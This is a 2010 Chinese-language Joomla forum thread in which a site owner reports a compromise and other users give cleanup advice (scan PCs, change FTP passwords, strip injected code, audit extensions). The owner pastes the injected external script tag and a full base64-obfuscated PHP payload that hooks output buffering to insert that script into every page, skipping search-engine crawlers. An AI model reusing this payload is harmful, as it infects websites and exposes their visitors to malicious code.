Demo

討論

保持飢餓,保持愚笨 (Stay hungry, stay foolish)。 史蒂夫·賈伯斯

公告

本網站已取消討論區的討論方式,如果您有問題請至LINE群行動條碼圖片網址,或Facebook社團

  1. 討論
  3. Joomla主程式討論區
  5. Joomla 1.5/1.6/1.7舊版
  7. [尋求幫助]1.5.20網站被植入病毒

[尋求幫助]1.5.20網站被植入病毒

  • gn898040
  • gn898040 的個人頭像 Topic Author
  • Offline
  • 專家會員
  • 專家會員
More
2010-10-06 05:16 #18949 來自 gn898040
gn898040 created the topic: [尋求幫助]1.5.20網站被植入病毒
網站發現被植入一個原本不屬於的程式碼,

<script src="http://meqashopperonline.com/mm.php"></script>

有處裡過類似的網友可以指導一下該如何下手尋找他修改的地方或者處裡方式嗎??

我網站http://Protw.net

Please 登入 to join the conversation.

  • Jikky
  • Jikky 的個人頭像
  • 訪客
  • 訪客
2010-10-06 13:03 #18951 來自 Jikky
Jikky replied the topic: [尋求幫助]1.5.20網站被植入病毒
先前遇過,據說是某台有此虛擬主機FTP帳號密碼的電腦中了木馬,處理方式:
1.自己電腦先掃毒,如果此虛擬主機FTP帳號密碼有其他人使用,也通知他們掃毒
2.更換虛擬主機FTP密碼
3.將目前網站中有問的植入碼手動移除,我的作法是整站下載下來,在自己電腦這端搜尋。但被植入的碼可能不只一種片段,搜尋替換完得再確認過。被植入的碼除了php,html也有可能。
4.如果有其他人共用此FTP帳號密碼,建議在確認木馬種在哪一台電腦前先不要提供他人新的FTP密碼,

如果有用google站長工具,可以從管理的網站的狀態看到是否有可疑的程式碼,先前是這樣發現的。

Please 登入 to join the conversation.

  • gn898040
  • gn898040 的個人頭像 Topic Author
  • Offline
  • 專家會員
  • 專家會員
More
2010-10-06 17:21 #18953 來自 gn898040
gn898040 replied the topic: [尋求幫助]1.5.20網站被植入病毒
經過努力後終於找到被修改好多地方
被修改的檔案超過100個以上大部分集中在administrator資料夾內
被植入代碼
eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5dFpYRmhjMmh2Y0hCbGNtOXViR2x1WlM1amIyMHZiVzB1Y0dod0lqNDhMM05qY21sd2REND0iKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));
目前正嘗試把網站所有檔案下載回來,把被植入代碼刪除掉,並且更新所有元件以及模組

Please 登入 to join the conversation.

More
2010-10-06 17:52 #18954 來自 羽城君拉
羽城君拉 replied the topic: [尋求幫助]1.5.20網站被植入病毒
1.有可能你用了有安全風險的套件:
http://feeds.joomla.org/JoomlaSecurityV ... Extensions

2.主機環境有安全風險:
-版本太舊
-沒有開啟防火牆
-權限管理(資料庫和檔案)沒調整好

3.安全性檢查
http://docs.joomla.org/Security_Checklist_7
...

Please 登入 to join the conversation.

  • Jikky
  • Jikky 的個人頭像
  • 訪客
  • 訪客
2010-10-07 09:44 #18957 來自 Jikky
Jikky replied the topic: [尋求幫助]1.5.20網站被植入病毒
再提醒一下,FTP密碼一定要改,同時要確定有多少人用這個FTP

先前自己的情形,FTP密碼改後,將被植入碼修正,確實安靜了一段時間,
後來因為開放給數個同事傳檔給廠商,果然又被植入了,
只好又改密碼鎖起來不給用,就真的安靜了
這次情形跟虛擬主機的安全性似乎沒關係

Please 登入 to join the conversation.

  • gn898040
  • gn898040 的個人頭像 Topic Author
  • Offline
  • 專家會員
  • 專家會員
More
2010-10-09 03:13 #18970 來自 gn898040
gn898040 replied the topic: [尋求幫助]1.5.20網站被植入病毒
我檢查過 php檔案 全部都中標,感染檔案超過5萬個檔案,請問一下 我下載來電腦移除掉該段惡意程式碼後
我再度上傳到網站恢復,檔案權限該怎處裡~~總數量7萬多個檔案......想到就頭暈了

Please 登入 to join the conversation.

  • bbfpl
  • bbfpl 的個人頭像
  • 訪客
  • 訪客
2010-10-11 01:38 #18983 來自 bbfpl
bbfpl replied the topic: [尋求幫助]1.5.20網站被植入病毒
我的網站以前也被黑過 http://www.joomlaocean.com ,現在好了,我沒備份,重新安裝的。

Please 登入 to join the conversation.

  1. 討論
  3. Joomla主程式討論區
  5. Joomla 1.5/1.6/1.7舊版
  7. [尋求幫助]1.5.20網站被植入病毒